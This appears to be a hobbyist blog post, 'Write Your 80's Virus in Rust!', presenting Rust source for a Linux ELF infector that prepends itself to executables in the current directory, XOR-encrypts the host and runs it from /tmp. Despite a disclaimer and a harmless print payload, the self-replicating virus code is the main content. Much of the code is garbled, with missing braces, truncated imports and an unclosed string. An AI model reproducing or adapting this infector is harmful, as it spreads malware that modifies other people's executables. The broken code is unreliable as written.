Write Your 80's Virus in Rust!
DISCLAIMER: It is important to note that this post is for learning purposes only. What you do with this content is your own decision, and I am not to be held accountable.
Every time I try to understand a new language, I try to practice its useful functions in byte scale projects. To me, the core libraries such as error handling, network, file, encryption, memory are the most interesting functionalities. Regarding the Rust compiler, I should say although its syntax is not what exactly I like, I was really impressed by its static type system and runtime error handling (panic). Moreover, I wish it had a built-in library for a pseudorandom generation too. I have shared my code here, and I wrote this in an afternoon, I know it's not neat, so I apologise in advance. This code is an old-school example of ELF infector in Linux, which affects files in the current directory. But, no worries it is quite safe so that there is no malicious payload, and it can be identified by major AntiVirus (yeah that has been said it is harmless!). One interesting point I found is that Rust has not any built-in library to allow using system calls, so another way around is using Unsafe Code Block, e.g., writing in C or inline Assembly.
How it works:
An infector works by adding its payload to the beginning of the host file to run itself during the execution of the infected file. This is one of the old-fashioned way of infection, straightforward and easy to code. In order to have more 80's theme, I used an XOR function for the encryption and decrypted operations at runtime.
Here is the code:
use std::ffi::{
use std::fs::File;
use std::io::prelude:: * ;
use std::io::{
use std::os::unix::fs::OpenOptionsExt;
use std::process::Command;
use std::{
const ELF_MAGIC: & [u8;4] = & [0x7f, 0x45, 0x4c, 0x46]; // b"\x7FELF"
const INFECTION_MARK: & [u8;5] = & [0x40, 0x54, 0x4d, 0x5a, 0x40]; // @TMZ@
const XOR_KEY: & [u8;5] = & [0x46, 0x65, 0x32, 0x4f, 0x33]; // Fe2O3
const VIRUS_SIZE: u64 = 2696040;
fn payload() {
println!("Rusting is a chemical reaction of iron in the presence of oxygen.
Common sheet metal rusting in dry air works like this: 4 Fe + 3 O2-- > 2 Fe2O3.This reaction is relatively slow and produces a thin coating of stable iron oxide Fe2O3, which is(technically) rust, but is a fairly benign form of rust.
fn get_file_size(path: & OsStr) - > u64 {
let metadata = fs::metadata( & path).unwrap();
return metadata.len();
fn read_file(path: & OsStr) - > Vec < u8 > {
let mut buf = Vec::new();
let mut f = File::open(path).unwrap();
f.read_to_end( & mut buf).unwrap();
return buf;
fn xor_enc_dec(input: Vec < u8 > ) - > Vec < u8 > {
let mut output = vec![0;input.len()];
for x in 0..input.len() {
output[x] = input[x] ^ XOR_KEY[x % XOR_KEY.len()];
return output;
fn is_elf(path: & OsStr) - > bool {
let mut ident = [0;4];
let mut f = File::open(path).unwrap();
f.read( & mut ident).unwrap();
if &ident == ELF_MAGIC { // this will work for PIE executables as well
return true; // but can fail for shared libraries during execution
return false;
fn is_infected(path: & OsStr) - > bool {
let file_size: usize = get_file_size(path) as usize;
let buf = read_file(path);
for x in 1..file_size {
if &buf[x] == & INFECTION_MARK[0] {
for y in 1..INFECTION_MARK.len() {
if (x + y) >= file_size {
if &buf[x + y] != & INFECTION_MARK[y] {
if y == INFECTION_MARK.len() - 1 {
return true;
return false;
fn infect(virus: & OsString, target: & OsStr) {
let host_buf = read_file(target);
let mut encrypted_host_buf = xor_enc_dec(host_buf);
let mut virus_buf = vec![0;VIRUS_SIZE as usize];
let mut f = File::open(virus).unwrap();
f.read_exact( & mut virus_buf).unwrap();
let mut infected = File::create(target).unwrap();
infected.write_all( & mut virus_buf).unwrap();
infected.write_all( & mut encrypted_host_buf).unwrap();
fn run_infected_host(path: & OsString) {
let mut encrypted_host_buf = Vec::new();
let mut infected = File::open(path).unwrap();
let plain_host_path = "/tmp/host";
let mut plain_host = fs::OpenOptions::new()
infected.read_to_end( & mut encrypted_host_buf).unwrap();
let mut decrypted_host_buf = xor_enc_dec(encrypted_host_buf);
plain_host.write_all( & mut decrypted_host_buf).unwrap();
fn main() {
let args: Vec < String > = env::args().collect();
let myself = OsString::from( & args[0]);
let current_dir = env::current_dir().unwrap();
for entry in fs::read_dir(current_dir).unwrap() {
let entry = entry.unwrap();
let path = entry.path();
let metadata = fs::metadata( & path).unwrap();
if metadata.is_file() {
let entry_name = path.file_name().unwrap();
if myself == entry_name {
if is_elf(entry_name) {
if !is_infected(entry_name) {
infect( & myself, entry_name);
if get_file_size( & myself) > VIRUS_SIZE {
run_infected_host( & myself);
} else {